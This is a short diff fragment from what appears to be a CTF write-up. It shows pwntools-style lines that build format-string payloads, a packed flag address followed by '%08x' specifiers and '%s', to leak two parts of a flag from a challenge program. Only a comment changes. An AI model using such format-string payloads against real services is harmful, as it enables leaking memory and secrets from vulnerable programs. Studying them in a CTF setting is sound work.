0xSh4dy/ctf_writeups/F_zzz.md

 #payload = p32(flag1) +('%08x '*6+'%s').encode()

-# After you get the first part of the flag, use this payload after removing the first one
+# After you get the first part of the flag, use this payload to get the second part.
 #payload = p32(flag2) +('%08x '*6+'%s').encode()
 target.recvuntil("ploxx")
 target.sendline(payload)